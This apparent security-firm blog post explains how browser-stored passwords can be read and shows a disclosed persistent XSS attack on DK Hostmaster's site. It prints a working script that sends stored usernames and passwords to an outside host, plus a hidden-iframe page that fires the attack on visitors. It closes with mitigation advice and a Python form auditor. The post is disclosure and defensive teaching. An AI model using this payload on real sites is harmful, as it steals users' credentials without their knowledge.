Posted: April 23, 2013

Many websites have a login form where users provide a username and password. The default behaviour of browsers is to let users store these credentials locally in the browser, so the next time a similar form appears the username and password are already populated, as seen in Figure 1. This is convenient for the user but not secure.

Figure 1: Autocomplete

First of all, it is very easy to retrieve the password in clear text. Go to a page where you may have stored a username and password. In most browsers you can right-click on the password field and select “Inspect element”. This brings up part of the HTML source code, as seen in Figure 2. There is an attribute named “type” with the value “password”. Replace the value with “text” and you will see the password in clear text.

Figure 2: Autocomplete Password

This can be exploited by attackers. The obvious case is when an attacker gains direct access to your computer, e.g., if someone “just wants to check the news” on your computer.

Proof of Concept

If your website allows autocompletion and also contains a Cross-Site Scripting (XSS) vulnerability, it is open to very dangerous attacks.

Example: The Danish top-level domain registry DK Hostmaster allows autocompletion, and in 2012 Hackavoid found a persistent XSS vulnerability on their website. We helped them fix the vulnerability and they approved the publication of the details. This avoided a potential massive password leak: with a password in hand, an attacker is free to shut down domain names, reroute traffic, etc.

With JavaScript it is possible to retrieve the value of INPUT fields such as username and password fields. A simple example:

 var username = document.getElementById('user').value;
 var password = document.getElementById('pass').value;

As a PoC we created a script that retrieved the username and password from the DK Hostmaster page using JavaScript and sent them back to us. It looked like this:

 <!-- Persistent XSS -->
 <script>
      setTimeout(function() {getPass();},500);
      function getPass() {
           var username = document.getElementById('user').value;
           var password = document.getElementById('pass').value;
           document.write("<img src='https://www.hackavoid.com/gotit?username=" + username + "&password=" + password+"' />");
      }
 </script>

Notice the small delay of 500 ms: the browser needs a little time to populate the form fields with the stored credentials. Now, when a user visits the DK Hostmaster page containing this persistent XSS exploit script, we get the credentials, as seen in Figure 3.

Figure 3: Request With Credentials

The next step was to get the username and password from other users. On a simple web page, let’s call it www.secavoid.com, we placed a hidden IFRAME:

 <iframe src="https://www.dk-hostmaster.dk/index.php?input=hackavoid.com&ns=&id=94&lang=da" style="visibility:hidden"></iframe>

Thereby, when any user visited www.secavoid.com, the IFRAME was loaded in the background, resulting in an HTTP GET request to “https://www.dk-hostmaster.dk/index.php?input=hackavoid.com&ns=&id=94&lang=da”, the page that contained the persistent XSS exploit script shown above. Since it is the user’s own browser that makes the request, any username and password stored in that browser are filled into the form inside the hidden IFRAME. Therefore, the exploit script retrieves the user’s credentials and sends them back to us without the user’s knowledge.

So, because of autocomplete combined with an XSS vulnerability, we were able to retrieve every stored username and password for DK Hostmaster’s web page from the users that visited our attack site.

What to do?

On all of your login forms, add the attribute “autocomplete” with the value “off”. And, of course, avoid XSS vulnerabilities.
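As an added defensive check (example code, not Hackavoid’s own scanner or anything from DK Hostmaster), the following Python script parses a page’s HTML and lists the login forms whose password field has autocomplete="off" on neither the form nor the field itself; the sample markup is constructed for the example.

```python
from html.parser import HTMLParser

# Constructed sample page (not DK Hostmaster's markup): three login forms,
# one protected at form level, one at field level, and one unprotected.
SAMPLE_HTML = """
<form action="/admin" autocomplete="off">
  <input id="user" type="text"><input id="pass" type="password">
</form>
<form action="/portal">
  <input name="u" type="text"><input name="p" type="password" autocomplete="off">
</form>
<form action="/login">
  <input id="user" type="text"><input id="pass" type="password">
</form>
"""

def _autocomplete_off(attrs):
    return (attrs.get("autocomplete") or "").strip().lower() == "off"

class LoginFormAudit(HTMLParser):
    """Collects every <form> that holds a password input, noting which of those
    inputs have autocomplete="off" on neither the form nor the field itself."""
    def __init__(self):
        super().__init__()
        self.forms = []     # finished forms that contain a password field
        self._form = None   # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "form":
            self._form = {"action": a.get("action", ""), "form_off": _autocomplete_off(a),
                          "has_password": False, "unprotected": []}
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "text").lower() != "password":
                return  # only password inputs matter for this audit
            self._form["has_password"] = True
            if not (self._form["form_off"] or _autocomplete_off(a)):
                self._form["unprotected"].append(a.get("name") or a.get("id") or "<unnamed>")

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            if self._form["has_password"]:
                self.forms.append(self._form)
            self._form = None

def find_unprotected_login_forms(html):
    # Returns the login forms whose password field the browser may still autofill.
    parser = LoginFormAudit()
    parser.feed(html)
    parser.close()
    return [f for f in parser.forms if f["unprotected"]]
```

Feed it the HTML of each page you serve and fix every form it reports. Note that current browsers largely ignore autocomplete="off" on login fields, so this check only verifies the mitigation recommended above and is no substitute for removing the XSS.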

If you have a hard time finding all the login forms missing the attribute, or if you want a scanner to find the XSS vulnerabilities, Hackavoid.com can help you. We give you one test scan for free.